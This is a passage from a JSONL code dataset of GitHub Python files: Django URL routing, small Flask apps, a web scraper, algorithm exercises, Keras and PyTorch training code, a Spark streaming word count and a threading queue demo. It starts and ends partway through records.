name=\"manage_user_object_permissions\",\n ),\n path(\n \"permissions/object/group/\",\n views.GroupObjectPermissionsListBaseView.as_view(),\n name=\"manage_group_object_permissions\",\n ),\n path(\n \"permissions/global/user//delete/\",\n views.UserGlobalPermissionDeleteView.as_view(),\n name=\"delete_user_global_permission\",\n ),\n path(\n \"permissions/global/group//delete/\",\n views.GroupGlobalPermissionDeleteView.as_view(),\n name=\"delete_group_global_permission\",\n ),\n path(\n \"permissions/object/user//delete/\",\n views.UserObjectPermissionDeleteView.as_view(),\n name=\"delete_user_object_permission\",\n ),\n path(\n \"permissions/object/group//delete/\",\n views.GroupObjectPermissionDeleteView.as_view(),\n name=\"delete_group_object_permission\",\n ),\n path(\n \"permissions/assign/\",\n views.SelectPermissionForAssignView.as_view(),\n name=\"select_permission_for_assign\",\n ),\n path(\n \"permissions//assign/\",\n views.AssignPermissionView.as_view(),\n name=\"assign_permission\",\n ),\n path(\"pdfs//\", views.RedirectToPDFFile.as_view(), name=\"redirect_to_pdf_file\"),\n]\n\n# Use custom server error handler to get a request object in the template\nhandler500 = views.server_error\n\n# Add URLs for optional features\nif hasattr(settings, \"TWILIO_ACCOUNT_SID\"):\n from two_factor.gateways.twilio.urls import urlpatterns as tf_twilio_urls # noqa\n\n urlpatterns += [path(\"\", include(tf_twilio_urls))]\n\n# Serve javascript-common if in development\nif settings.DEBUG:\n urlpatterns.append(path(\"__debug__/\", include(debug_toolbar.urls)))\n\n# Automatically mount URLs from all installed AlekSIS apps\nfor app_config in apps.app_configs.values():\n if not app_config.name.startswith(\"aleksis.apps.\"):\n continue\n\n try:\n urlpatterns.append(path(f\"app/{app_config.label}/\", include(f\"{app_config.name}.urls\")))\n except ModuleNotFoundError:\n # Ignore exception as app just has no URLs\n pass # noqa\n","repo_name":"deepanshumehtaa/AlekSIS-Core","sub_path":"aleksis/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":12823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31282285905","text":"from flask import Flask, redirect, render_template, url_for, request, session\nfrom client import Client\n\nNAME_KEY = 'name'\n\napp = Flask(__name__)\napp.secret_key = \"helloasdgf\"\n\n\n@app.route(\"/login\", methods=[\"POST\", \"GET\"])\ndef login():\n if request.method == \"POST\":\n print(request.form)\n session[NAME_KEY] = request.form[\"inputName\"]\n return redirect(url_for(\"home\"))\n return render_template(\"login.html\", **{\"session\":\"session\"})\n\n\n@app.route(\"/logout\")\ndef logout():\n session.pop(NAME_KEY, None)\n return redirect(url_for(\"login\"))\n\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n if NAME_KEY not in session:\n return redirect(url_for(\"login\"))\n\n return render_template(\"index.html\", **{\"login\":True, \"session\":session})\n\n\n@app.route(\"/run\")\ndef run():\n print(\"clicked\")\n return \"none\"\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Jennifer331/Scripts","sub_path":"Chat App/website/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"23389971296","text":"import bs4, requests\r\n\r\ndef getUrlAuthor(nameUrl):\r\n res=requests.get(nameUrl)\r\n res.raise_for_status()\r\n\r\n soup=bs4.BeautifulSoup(res.text, 'html.parser')\r\n elems= soup.select('body > table > tbody > tr > td:nth-child(2) > p:nth-child(8) > a:nth-child(4)')\r\n return elems[0].text.strip() #listindexoutofrange #lesson40 in videos\r\n\r\nname= getUrlAuthor('http://dr-chuck.com/')\r\nprint('the author\\'s name is '+name)\r\n","repo_name":"valik94/MyPythonScripts","sub_path":"HTMLParserBS4Example.py","file_name":"HTMLParserBS4Example.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23407442848","text":"\"\"\" PROBLEM\n\tSearch in a 2D sorted array\n\n\tWAP to if a number exists in a 2D sorted array.\n\n\"\"\"\n\n\"\"\" SOLUTION\n\tStart from the top right corner. This eleminates a row and a column together \n\tin every comparison.\n\tT.C.: O(m+n)\n\n\"\"\"\n\ndef matrix_search(A, num):\n\trow, col = 0, len(A[0]) - 1\n\n\twhile row < len(A) and col >= 0:\n\t\tif A[row][col] == num:\n\t\t\treturn True\n\t\telif A[row][col] < num:\n\t\t\t# eliminate the row\n\t\t\trow += 1\n\t\telse:\n\t\t\t# eliminate the column\n\t\t\tcol -= 1\n\n\treturn False\n\n\nA = [[-1,2,4,4,6], [1,5,5,9,21], [3,6,6,9,22], [3,6,8,10,24], [6,8,9,12,25], [8,10,12,13,40]]\nnum = 8\nprint(\"Matrix: {}\".format(A))\nprint(\"{} is present in the matrix: {}\".format(num, matrix_search(A, num)))\n","repo_name":"sheelabhadra/Elements-Programming-Interviews","sub_path":"Searching/search_2D.py","file_name":"search_2D.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"36946678154","text":"'''\r\nCreated on Dec 18, 2016\r\n\r\n@author: Yuehan\r\n'''\r\nimport math\r\nclass Solution(object):\r\n def trailingZeroes(self, n):\r\n '''return 0 if n == 0 else int(n / 5 + Solution.trailingZeroes(self,n / 5))'''\r\n \r\n if (n==0):\r\n return 0\r\n digts=math.floor(math.log(n)/math.log(5))\r\n a=0;\r\n result=0;\r\n while (digts):\r\n a=math.floor(n/(5**digts))-math.floor(n/(5**(digts+1)))\r\n result=result+a*digts\r\n digts=digts-1\r\n return int(result)\r\n \r\n\r\nprint(Solution.trailingZeroes(0,200))\r\n","repo_name":"yuehanlyu/Leetcode_git","sub_path":"leetcode/L172_FactorialTrailingZeroes.py","file_name":"L172_FactorialTrailingZeroes.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5344552772","text":"import numpy as np\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Activation\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.metrics import Precision, Recall\n\n\nclass Baseline():\n \n def __init__(self):\n self.classes_ = None\n self.classes_inverse_ = None\n self.means_ = None\n self.mean_dict = None\n self.label_dict = None\n \n def predict(self, X):\n predicts = []\n self.label_dict = {num:label for num,label in zip(np.arange(len(self.classes_)), self.classes_)}\n\n # Calculate and store closest class spectral vector for each data sample\n for sample in X:\n mean_index = np.argmin([np.sqrt(sum((sample - mean_vector)**2)) for mean_vector in self.mean_dict.values()])\n predicts.append(self.label_dict[mean_index])\n\n return np.array(predicts)\n \n def fit(self, X_train, y_train):\n self.classes_, self.classes_inverse_ = np.unique(y_train, return_inverse=True)\n self.means_ = [np.mean(X_train[self.classes_inverse_==idx,:], axis=0) for idx,label in enumerate(self.classes_)]\n self.mean_dict = {label: self.means_[i] for i,label in enumerate(self.classes_)}\n\ndef create_model(X, n_classes, n_hidden=3, opt='Adam', hidden_units=100, drop_out=0, activ='sigmoid'):\n '''Create a deep neural network model\n \n Parameters\n ----------\n X: array\n X data that will be used to train the network\n n_classes: int\n Number of classes to predict\n n_hidden: int\n Number of hidden layers\n opt: keras optimizer object\n Optimizer to use with neural network\n hidden_units: int\n Number of hidden units to use in the hidden layers\n drop_out: float\n dropout rate\n activ: str\n Activation function for hidden layer units\n\n Returns\n -------\n model: keras model object\n A compiled model\n '''\n np.random.seed(42)\n\n n_samples, n_feats = X.shape # Get shape of input data to construct network\n\n model = Sequential() \n\n hidden_layer = Dense(units=hidden_units,\n input_dim=n_feats,\n kernel_initializer='constant',\n activation='softsign')\n\n # Add first hidden layer, if required\n if n_hidden>0:\n model.add(Dense(units=hidden_units,\n input_dim=n_feats,\n kernel_initializer='uniform',\n activation=activ))\n #model.add(Dropout(drop_out))\n else:\n hidden_units=n_feats\n\n # Define output layer\n outputlayer = Dense(units=n_classes,\n input_dim=hidden_units,\n kernel_initializer='uniform',\n activation='softmax')\n\n # Add hidden layers to model, if required\n if n_hidden>1:\n for _ in np.arange(1,n_hidden):\n model.add(Dense(units=hidden_units,\n kernel_initializer='uniform',\n activation=activ))\n #model.add(Dropout(drop_out))\n\n # Add output layer \n model.add(outputlayer)\n\n # Compile model\n model.compile(loss='categorical_crossentropy', \n optimizer=opt, metrics=[\"accuracy\"])\n return model","repo_name":"jstodd867/landsat-classification","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39073922076","text":"import requests\nfrom flask import Flask, url_for, request, render_template\napp = Flask(__name__) \nURL_BASE=\"https://swapi.co/api/\"\n\n@app.route('/')\ndef inicio():\n return render_template(\"index.html\")\n\n@app.route('/peliculas/')\ndef peliculas():\n\tr=requests.get(URL_BASE+'films/')\n\tif r.status_code == 200:\n\t\tdoc = r.json() \n\t\treturn render_template(\"peliculas.html\",datos=doc[\"results\"])\n\t\t\t\n@app.route('/peliculas/')\ndef peliculas_detalle(id):\n\tr=requests.get(URL_BASE+'films/%d'%id)\n\tif r.status_code == 200:\n\t\tdoc = r.json() \n\t\treturn render_template(\"peliculas_detalle.html\",datos=doc,id=id)\n\n@app.route('/peliculas//personajes')\ndef peliculas_personajes(id):\n\tr=requests.get(URL_BASE+'films/%d'%id)\n\tif r.status_code == 200:\n\t\tdoc = r.json() \n\t\turl_personajes=doc[\"characters\"]\n\t\tpersonajes=[]\n\t\tfor url_personaje in url_personajes:\n\t\t\tr=requests.get(url_personaje)\n\t\t\tif r.status_code == 200:\n\t\t\t\tdoc2=r.json()\n\t\t\t\tpersonajes.append(doc2[\"name\"])\n\n\t\treturn render_template(\"lista.html\",datos=zip(personajes,url_personajes),id=id,title=doc[\"title\"],subtitle=\"Personajes\",url_return=\"peliculas_detalle\")\n \n@app.route('/peliculas//planetas')\ndef peliculas_planetas(id):\n\tr=requests.get(URL_BASE+'films/%d'%id)\n\tif r.status_code == 200:\n\t\tdoc = r.json() \n\t\turl_planetas=doc[\"planets\"]\n\t\tplanetas=[]\n\t\tfor url_personaje in url_planetas:\n\t\t\tr=requests.get(url_personaje)\n\t\t\tif r.status_code == 200:\n\t\t\t\tdoc2=r.json()\n\t\t\t\tplanetas.append(doc2[\"name\"])\n\n\t\treturn render_template(\"lista.html\",datos=zip(planetas,url_planetas),id=id,title=doc[\"title\"],subtitle=\"Planetas\",url_return=\"peliculas_detalle\")\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"josedom24/swapi_examples","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27227850721","text":"from Bio.SeqRecord import SeqRecord\nfrom dnachisel.Specification.SpecificationSet import SpecificationSet\nfrom dnachisel.DnaOptimizationProblem.mixins import ConstraintsSolverMixin\nfrom dnachisel.MutationSpace import MutationSpace\n\n\nclass DnaDesignProblem(\n ConstraintsSolverMixin,\n \n ):\n\n def __init__(\n self,\n sequence,\n constraints=None,\n mutation_space=None,\n # tailor args\n design_space = None,\n solution_id = None,\n parent=None):\n\n if isinstance(sequence, SeqRecord):\n self.record = sequence\n self.sequence = str(sequence.seq).upper()\n else:\n self.record = None\n self.sequence = sequence.upper()\n self.constraints = [] if constraints is None else list(constraints)\n self.mutation_space = mutation_space\n\n self.design_space = design_space\n self.solution_id = solution_id\n self.parent = parent\n\n self.scores = {}\n self.levels = {}\n\n self.initialize()\n \n def _set_scores(self):\n for i in range(len(self.design_space.feature_label)):\n self.scores[self.design_space.feature_label[i]] = self.design_space.feature_specification[i].evaluate(self).score\n \n def _set_level(self):\n for i in range(len(self.design_space.feature_label)):\n feature_label = self.design_space.feature_label[i]\n self.levels[feature_label + \"_Level\"] = self.design_space.range_set_list[i].get_level(self.scores[feature_label])\n\n \n \n def initialize(self):\n\n # for specs in self.constraints:\n specsets = [\n spec for spec in self.constraints if isinstance(spec, SpecificationSet)\n ]\n specs_in_sets = [\n spec\n for specset in specsets\n for spec in specset.specifications.values()\n ]\n for specset in specsets:\n self.constraints.remove(specset)\n self.constraints.extend(specs_in_sets)\n\n # INITIALIZE THE CONSTRAINTS AND OBJECTIVES\n\n self.constraints = [\n constraint.initialized_on_problem(self, role=\"constraint\")\n for constraint in self.constraints\n ]\n\n self.sequence_before = self.sequence\n self._constraints_before = None\n self._objectives_before = None\n\n # INITIALIZE THE MUTATION SPACE\n\n if self.mutation_space is None:\n self.mutation_space = MutationSpace.from_optimization_problem(self)\n # If the original sequence is outside of the allowed mutations\n # space, replace the sequence by a sequence which complies with\n # the mutation space.\n self.sequence = self.mutation_space.constrain_sequence(\n self.sequence\n )\n \n self._set_scores()\n self._set_level()\n\n\n def is_match_design(self,desired_design):\n levels = [\n str(self.levels[feature+'_Level']) \n for feature in self.design_space.feature_label\n ]\n\n return '.'.join(levels) == desired_design","repo_name":"HealthCodon/dnachisel_dtailor_mode","sub_path":"dnachisel_dtailor_mode/DnaDesignProblem.py","file_name":"DnaDesignProblem.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"573375091","text":"import os\r\n\r\nimport torch\r\nfrom tqdm import tqdm\r\n\r\nfrom utils.utils import get_lr\r\n\r\n\r\ndef fit_one_epoch(model_train, model, multi_loss, loss_history, optimizer, epoch, epoch_step, epoch_step_val, gen, gen_val, Epoch, cuda, fp16, scaler, save_period, save_dir, local_rank=0):\r\n total_loss = 0\r\n val_loss = 0\r\n\r\n if local_rank == 0:\r\n print('Start Train')\r\n pbar = tqdm(total=epoch_step,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3)\r\n model_train.train()\r\n for iteration, batch in enumerate(gen):\r\n if iteration >= epoch_step:\r\n break\r\n images, targets, masks_gt, num_crowds = batch[0], batch[1], batch[2], batch[3]\r\n with torch.no_grad():\r\n if cuda:\r\n images = images.cuda(local_rank)\r\n targets = [ann.cuda(local_rank) for ann in targets]\r\n masks_gt = [mask.cuda(local_rank) for mask in masks_gt]\r\n #----------------------#\r\n # 清零梯度\r\n #----------------------#\r\n optimizer.zero_grad()\r\n if not fp16:\r\n #----------------------#\r\n # 前向传播\r\n #----------------------#\r\n outputs = model_train(images)\r\n #----------------------#\r\n # 计算损失\r\n #----------------------#\r\n losses = multi_loss(outputs, targets, masks_gt, num_crowds)\r\n losses = {k: v.mean() for k, v in losses.items()} # Mean here because Dataparallel.\r\n loss = sum([losses[k] for k in losses])\r\n\r\n #----------------------#\r\n # 反向传播\r\n #----------------------#\r\n loss.backward()\r\n optimizer.step()\r\n else:\r\n from torch.cuda.amp import autocast\r\n with autocast():\r\n #----------------------#\r\n # 前向传播\r\n #----------------------#\r\n outputs = model_train(images)\r\n #----------------------#\r\n # 计算损失\r\n #----------------------#\r\n losses = multi_loss(outputs, targets, masks_gt, num_crowds)\r\n losses = {k: v.mean() for k, v in losses.items()} # Mean here because Dataparallel.\r\n loss = sum([losses[k] for k in losses])\r\n\r\n #----------------------#\r\n # 反向传播\r\n #----------------------#\r\n scaler.scale(loss).backward()\r\n scaler.step(optimizer)\r\n scaler.update()\r\n \r\n total_loss += loss.item()\r\n \r\n if local_rank == 0:\r\n pbar.set_postfix(**{'total_loss': total_loss / (iteration + 1), \r\n 'lr' : get_lr(optimizer)})\r\n pbar.update(1)\r\n\r\n if local_rank == 0:\r\n pbar.close()\r\n print('Finish Train')\r\n print('Start Validation')\r\n pbar = tqdm(total=epoch_step_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3)\r\n\r\n model_train.eval()\r\n for iteration, batch in enumerate(gen_val):\r\n if iteration >= epoch_step_val:\r\n break\r\n images, targets, masks_gt, num_crowds = batch[0], batch[1], batch[2], batch[3]\r\n with torch.no_grad():\r\n if cuda:\r\n images = images.cuda(local_rank)\r\n targets = [ann.cuda(local_rank) for ann in targets]\r\n masks_gt = [mask.cuda(local_rank) for mask in masks_gt]\r\n\r\n optimizer.zero_grad()\r\n #----------------------#\r\n # 前向传播\r\n #----------------------#\r\n outputs = model_train(images)\r\n #----------------------#\r\n # 计算损失\r\n #----------------------#\r\n losses = multi_loss(outputs, targets, masks_gt, num_crowds)\r\n losses = {k: v.mean() for k, v in losses.items()}\r\n loss = sum([losses[k] for k in losses])\r\n\r\n val_loss += loss.item()\r\n \r\n if local_rank == 0:\r\n pbar.set_postfix(**{'val_loss': val_loss / (iteration + 1), \r\n 'lr' : get_lr(optimizer)})\r\n pbar.update(1)\r\n\r\n if local_rank == 0:\r\n pbar.close()\r\n print('Finish Validation')\r\n loss_history.append_loss(epoch + 1, total_loss / epoch_step, val_loss / epoch_step_val)\r\n print('Epoch:'+ str(epoch+1) + '/' + str(Epoch))\r\n print('Total Loss: %.3f || Val Loss: %.3f ' % (total_loss / epoch_step, val_loss / epoch_step_val))\r\n \r\n #-----------------------------------------------#\r\n # 保存权值\r\n #-----------------------------------------------#\r\n if (epoch + 1) % save_period == 0 or epoch + 1 == Epoch:\r\n torch.save(model.state_dict(), os.path.join(save_dir, 'ep%03d-loss%.3f-val_loss%.3f.pth' % (epoch + 1, total_loss / epoch_step, val_loss / epoch_step_val)))\r\n \r\n if len(loss_history.val_loss) <= 1 or (val_loss / epoch_step_val) <= min(loss_history.val_loss):\r\n print('Save best model to best_epoch_weights.pth')\r\n torch.save(model.state_dict(), os.path.join(save_dir, \"best_epoch_weights.pth\"))\r\n \r\n torch.save(model.state_dict(), os.path.join(save_dir, \"last_epoch_weights.pth\"))\r\n","repo_name":"bubbliiiing/yolact-pytorch","sub_path":"utils/utils_fit.py","file_name":"utils_fit.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"61"}
+{"seq_id":"43939583255","text":"import threading\nfrom queue import Queue\n\n\n# 定义生产者函数\ndef producer(queue, items):\n for item in items:\n # 生产者向队列中放入数据\n queue.put(item)\n\n\n# 定义消费者函数\ndef consumer(queue):\n while True:\n item = queue.get()\n # 消费者从队列中取出数据并进行处理\n print(\"Consumed:\", item)\n queue.task_done()\n\n\n# 创建队列\nqueue = Queue()\n\n# 创建生产者线程并启动\nproducer_thread = threading.Thread(target=producer, args=(queue, [1, 2, 3, 4, 5]))\nproducer_thread.start()\n\n# 创建消费者线程并启动\nconsumer_thread = threading.Thread(target=consumer, args=(queue,))\nconsumer_thread.start()\n\n# 阻塞主线程,等待队列中的任务完成\nqueue.join()\n\n# 输出:\n# Consumed: 1\n# Consumed: 2\n# Consumed: 3\n# Consumed: 4\n# Consumed: 5\n","repo_name":"showyouhappiness/Python_study","sub_path":"并发/多线程与队列/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"374159006","text":"from adaptft.tft import TFTransformer\nimport numpy as np\nimport matplotlib.pyplot as plt\n\naudio_path = \"/home/rejinal/Datasets/SAFE/VJRS_05_062.08.wav\"\n\nTFT = TFTransformer(audio_path)\nsst = np.asarray([i for i in TFT.compute_sst()])\nscaled_sst = np.log(1 + sst ** 2.0)\n\n# Get rid of the channel axis\nscaled_sst = np.reshape(scaled_sst, [scaled_sst.shape[0], scaled_sst.shape[2]])\n\nplt.pcolormesh(scaled_sst.T, cmap=\"Greys\")\nplt.show()\ninput(\"Press ENTER to finish\")","repo_name":"alexberrian/AdapTFT","sub_path":"tests/test_sst.py","file_name":"test_sst.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23624996591","text":"'''\r\nCreated on 21.05.2011\r\n\r\n@author: LordB\r\n'''\r\n\r\ninFile = open('A-large.in', 'r')\r\noutFile = open('output_Problem_1_large.txt', 'w')\r\n\r\nnrOfCases = int( inFile.readline() )\r\nstatistics = []\r\nwr = []\r\nowp = []\r\noowp = []\r\n\r\ndef calcWP(i):\r\n games = 0\r\n wins = 0\r\n for c in statistics[i]:\r\n if (c == '1'):\r\n wins += 1\r\n games += 1\r\n elif(c == '0'):\r\n games += 1\r\n\r\n wr[i] = ([wins, games])\r\n\r\ndef calcOWP(i):\r\n average = 0.0\r\n games = 0\r\n counter = 0\r\n for j in wr:\r\n if( counter != i):\r\n if(statistics[i][counter] == '1'):\r\n average += j[0] / (j[1]-1)\r\n games += 1\r\n elif(statistics[i][counter] == '0'):\r\n average += (j[0]-1) / (j[1]-1)\r\n games += 1\r\n counter += 1\r\n owp[i] = average / games\r\n \r\ndef calcOOWP(i):\r\n average = 0.0\r\n nrOfOp = 0\r\n counter = 0\r\n for j in owp:\r\n if(i != counter):\r\n if(statistics[i][counter] != '.'):\r\n nrOfOp += 1\r\n average += j\r\n counter += 1\r\n #print('OOWP: ', (average / nrOfOp) )\r\n oowp[i] = (average / nrOfOp)\r\n\r\nfor caseNr in range(1, nrOfCases+1):\r\n print('Working on #', caseNr)\r\n statistics = []\r\n wr = []\r\n owp = []\r\n oowp = []\r\n \r\n nrOfTeams = int( inFile.readline() )\r\n \r\n for i in range(nrOfTeams):\r\n wr.append([])\r\n owp.append([])\r\n oowp.append([])\r\n \r\n for i in range(nrOfTeams):\r\n tmp = inFile.readline()\r\n list = []\r\n for c in tmp:\r\n list.append(c)\r\n statistics.append(list)\r\n \r\n for i in range(nrOfTeams):\r\n calcWP(i)\r\n for i in range(nrOfTeams):\r\n calcOWP(i)\r\n for i in range(nrOfTeams):\r\n calcOOWP(i)\r\n \r\n outFile.write('Case #{}:\\n'.format(caseNr)) \r\n for i in range(nrOfTeams):\r\n winratio = wr[i][0] / wr[i][1]\r\n rpi = 0.25 * winratio + 0.5 * owp[i] + 0.25 * oowp[i]\r\n print(rpi)\r\n outFile.write( ('{}\\n'.format(rpi)) )\r\n\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_81/322.py","file_name":"322.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71335809794","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 12 14:19:07 2021\n\n@author: user\n\"\"\"\n\n\nx=5\n\nif x==10:\n print('10입니다')\n \nelse:\n print('10이 아님') #else는 if랑 줄이 맞춰져야 함.\n\n\n \n \n\n\nx=10\n\ny=20\n\nif x==10 and y==20:\n print('참')\n \nelse:\n print('거짓')\n\n\n\nif 0 < x < 20:\n print('dddd')\nelse:\n print('x')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"kokoko12334/TIL2","sub_path":"python/unit14 else 사용하기.py","file_name":"unit14 else 사용하기.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10300229414","text":"#django 批量导入数据\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"django_shop.settings\")\n\n#django 1.6以下版本不需要写这个\nimport django\ndjango.setup()\n\nfrom goods.models import Goods\nfrom dbtools.data.product_data import row_data #拿取数据\nfrom goods.models import GoodsCategory\n\ndef addGoods():\n for item in row_data:\n name=item['name']\n desc=item['desc']\n if not desc:\n desc=''\n sale_price=float(item['sale_price'].replace('¥','').replace('元',''))\n market_price = float(item['market_price'].replace('¥', '').replace('元', '')) # '¥232元'\n goods_desc = item['goods_desc']\n images = item['images']\n goods_front_image=images[0]\n categorys = item['categorys'] # 分类的路径\n category = GoodsCategory.objects.filter(name=categorys[-1]).first() # 分类\n Goods.objects.create(name=name,\n goods_brief=desc,\n shop_price=sale_price,\n market_price=market_price,\n goods_desc=goods_desc,\n category=category,\n goods_front_image=goods_front_image)\naddGoods()\n","repo_name":"Iamnilaoba/django_shop","sub_path":"dbtools/addGoods.py","file_name":"addGoods.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14082320998","text":"import pandas, geopandas\nfrom enum import Enum\n\nclass DataTypes(Enum):\n Void=0\n GeoShape=1\n Excel=2\n CSV=3\n\ndef locations(which):\n \"\"\"Helper function to locate the different databases I'll look at\"\"\"\n res={\n 'referendum':'/input_data/Referendum.csv',\n 'geodata':'/input_data/GeoShapeCommunes/communes-20220101.shp',\n 'recensement':'/input_data/base-cc-evol-struct-pop-2013/base-cc-evol-struct-pop-2013.xls',\n 'revenus':'/input_data/filo-revenu-pauvrete-menage-2013/filo-revenu-pauvrete-menage-2013.xls',\n 'diplomes':'/input_data/pop-16ans-dipl6817/pop-16ans-dipl6817.xlsx',\n 'diploma_helper':'/input_data/HelperDataframeDiploma.csv'\n }\n return res[which]\n\n\n\ndef diploma_class():\n \"\"\"Converts diploma numbers into the equivalent age at which someone who doesn't double would finish\n Put 6 for people without diplomas\"\"\"\n res = {\n 0: 6, #No diploma\n 1: 11, #CEP\n 2: 14, #BEPC\n 3: 16, #Bac\n 4: 18,\n 5: 21,\n 6: 24\n }\n return res\n\ndef mean_diploma(x,helper_df):\n tot_pop=0.\n tot_diploma=0.\n\n diplomas = helper_df.columns\n for col in diplomas:\n current_diploma=diploma_class()[helper_df[col][\"DIPLÔME\"]]\n current_pop=x[col]\n tot_pop += current_pop\n tot_diploma += current_pop*current_diploma\n\n return tot_diploma/tot_pop\n\n\ndef socio_pro_class():\n res = {\n 'C13_POP15P_CS1': 'Agriculteurs',\n 'C13_POP15P_CS2': 'Artisans/commercants',\n 'C13_POP15P_CS3': 'Cadres',\n 'C13_POP15P_CS4': 'Profs',\n 'C13_POP15P_CS5': 'Employés',\n 'C13_POP15P_CS6': 'Ouvriers',\n 'C13_POP15P_CS7': 'Retraites',\n 'C13_POP15P_CS8': 'Autres'\n }\n return res\n\n\ndef age_class():\n res = {\n '0014': (0,14),\n '1529': (15,29),\n '3044': (29,44),\n '4559': (45,59),\n '6074': (60,74),\n '7589': (75,89),\n '90P': (90,90)\n }\n return res\n\ndef mean_age(x,suffix='P13_POP'):\n tot_pop=0.\n tot_age=0.\n\n for idx,val in age_class().items():\n current_pop = x[suffix+idx]\n age=(val[0]+val[1])/2.\n tot_age += current_pop*age\n tot_pop += current_pop\n\n return tot_age/tot_pop\n","repo_name":"cyrilbecot/StGobain_CaseStudy","sub_path":"data_reader/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36481434580","text":"from pyspark.sql import SparkSession\nfrom utils.logger import Log4j\nfrom pyspark.sql.functions import split, explode\n\nif __name__ == \"__main__\":\n spark = SparkSession.builder\\\n .appName(\"Streaming Word Cound\") \\\n .master(\"local[3]\") \\\n .config(\"spark.streaming.stopGracefullyOnStutdown\", \"true\") \\\n .config(\"spark.sql.shuffle.partitions\", 3) \\\n .getOrCreate()\n\n logger = Log4j(spark)\n line_df = spark.readStream\\\n .format(\"socket\")\\\n .option(\"host\", \"localhost\")\\\n .option(\"port\", 9999)\\\n .load()\n\n logger.info('Streaming Dataframe ' + line_df.schema.simpleString())\n words_df = line_df.selectExpr(\"explode(split(value,' ')) as word\")\n count_df= words_df.groupBy(\"word\").count()\n logger.info('Streaming Dataframe ' + count_df.schema.simpleString())\n\n word_count_df = count_df.writeStream\\\n .format(\"console\")\\\n .option(\"checkpointLocation\", \"chk-point-dir\")\\\n .outputMode(\"complete\")\\\n .start()\n\n logger.info('Listerning to localhost:9999')\n word_count_df.awaitTermination()\n","repo_name":"nileshvarshney/basic_pyspark","sub_path":"structured_streaming/streamingWC/streamingWC.py","file_name":"streamingWC.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10368738336","text":"#import potrzebnych bibliotek\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow import keras\nfrom tensorflow.keras.optimizers import SGD,RMSprop\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Flatten, add, Dense, Dropout\nfrom tensorflow.keras.losses import SparseCategoricalCrossentropy\nfrom tensorflow.keras.layers import Convolution2D, MaxPool2D, BatchNormalization\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img\nimport numpy as np\n\n#funkcja do rysowania wykresów dla accuracy i funkcji straty\ndef draw_curves(history, key1, ylim1):\n plt.figure(figsize=(12, 4))\n plt.plot(history.history[key1], \"r--\")\n plt.plot(history.history['val_' + key1], \"g--\")\n plt.ylabel(key1)\n plt.xlabel('Epoch')\n plt.ylim(ylim1)\n plt.legend(['train', 'test'], loc='best')\n plt.show()\n\n#wczytanie danych i przygotowanie ich do procesu uczenia\ncifar10 = tf.keras.datasets.cifar10\n(X_train, y_train), (X_val, y_val) = cifar10.load_data()\nX_train, X_test, y_train, y_test = train_test_split(X_train, y_train)\nclass_names = ['samolot', 'samochód', 'ptak', 'kot', 'jeleń',\n 'pies', 'żaba', 'koń', 'statek', 